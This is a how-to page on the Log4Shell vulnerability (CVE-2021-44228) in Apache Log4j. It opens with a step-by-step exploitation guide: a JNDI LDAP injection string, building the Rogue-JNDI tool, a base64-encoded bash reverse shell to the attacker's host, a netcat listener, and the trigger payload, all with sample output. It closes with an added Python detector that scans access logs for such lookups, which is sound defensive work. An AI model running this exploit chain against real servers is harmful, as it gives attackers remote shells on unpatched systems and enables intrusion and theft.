CVE - Log4Shell

Log4Shell is a critical vulnerability, tracked as CVE-2021-44228, discovered in the Apache Log4j library, which is widely used for logging in Java-based applications. It allows attackers to execute arbitrary code on a server by injecting a malicious payload into a log message.

The following steps show how an attack against a target affected by this vulnerability works:

  • Send a payload to confirm the server is connecting back

# Insert this payload on the vulnerable point
${jndi:ldap://$IP/test} # Specify your IP

# Set TCP listener on our machine
sudo tcpdump -i $interface port $LDAPport # Specify the network interface in use and the LDAP port (389 by default)

# If it works, we will see a result like this
01:02:56.775423 IP $TargetIP.48214 > $OurIP.ldap: Flags [S], seq 1793598680, win 64240, options [mss 1340,sackOK,TS val 2750652936 ecr 0,nop,wscale 7], length 0
01:02:56.775456 IP $OurIP.ldap > $TargetIP.48214: Flags [R.], seq 0, ack 1793598681, win 0, length 0

  • Install necessary Java tools to generate a payload

sudo apt install maven
sudo apt install openjdk-24-jdk

  • Download and build the Rogue-JNDI Java application

git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package

  • Create a payload to use

echo 'bash -c bash -i >&/dev/tcp/$IP/$port 0>&1' | base64

This example uses a reverse shell, but it could be any command desired for the RCE. The payload is encoded to avoid issues with Rogue-JNDI.

  • Start the Rogue-JNDI application while passing in the payload

# Use the encoded payload and specify your IP
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,$encPayload}|{base64,-d}|{bash,-i}" --hostname "$IP"

# If it works, we will see a result like this
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.117:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.117:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.117:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.117:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.117:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10.10.14.117:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.117:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.117:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2

  • (Optional) Set up a Netcat listener

nc -nvlp 4444

This applies when working with the reverse shell example.

  • Trigger the created payload through the vulnerable point

${jndi:ldap://$IP:1389/o=tomcat}
# If successful, the command will be executed on the target host
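
From the defender's side, the lookup strings used in the steps above end up in request logs, and the host and port inside them are the egress destinations to check in firewall logs or packet captures. The following Python code is an added example, not part of the original page or of Rogue-JNDI; the log format, sample lines and function names are constructed for illustration, and it matches only the lookup form shown on this page.

```python
import re
from urllib.parse import unquote

# Matches the lookup form shown on this page: ${jndi:ldap://host[:port]/path}
JNDI_RE = re.compile(
    r"\$\{jndi:ldap://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)
DEFAULT_LDAP_PORT = 389  # default LDAP port, as noted in the tcpdump step


def find_jndi_lookups(line):
    """Return (host, port, path) for every JNDI LDAP lookup found in one log line."""
    # Access logs usually record the request percent-encoded, so decode first.
    decoded = unquote(line)
    hits = []
    for m in JNDI_RE.finditer(decoded):
        port = int(m.group("port")) if m.group("port") else DEFAULT_LDAP_PORT
        hits.append((m.group("host"), port, m.group("path") or "/"))
    return hits


def scan(lines):
    """Map each callback endpoint (host, port) to the log line numbers naming it."""
    endpoints = {}
    for lineno, line in enumerate(lines, start=1):
        for host, port, _path in find_jndi_lookups(line):
            endpoints.setdefault((host, port), []).append(lineno)
    return endpoints


# Constructed sample access-log lines using documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:01:02:56 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9/test}"',
    '203.0.113.7 - - [10/Dec/2021:01:05:11 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%3A1389%2Fo%3Dtomcat%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '192.0.2.44 - - [10/Dec/2021:01:06:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for (host, port), linenos in scan(SAMPLE_LOG).items():
        print(f"egress to check: {host}:{port} (log lines {linenos})")
```

Each reported endpoint can then be compared against outbound connection records from the application server, such as the SYN to the LDAP port seen in the tcpdump output above.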
